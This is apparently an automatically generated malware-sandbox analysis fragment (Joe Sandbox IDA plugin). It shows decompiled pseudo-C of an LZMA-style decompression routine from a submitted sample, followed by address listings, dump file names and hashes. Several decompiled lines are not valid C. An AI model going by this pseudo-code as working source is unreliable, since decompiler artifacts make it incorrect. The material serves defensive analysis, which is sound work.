													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407234
0x00407234
0x00407238
0x0040725d
0x00407267
0x00000000
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407247
0x0040724b
0x0040724b
0x0040724e
0x00407328
0x00407328
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00000000
0x00407321
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00000000
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x004073c3
0x00000000
0x00407238

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F4A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
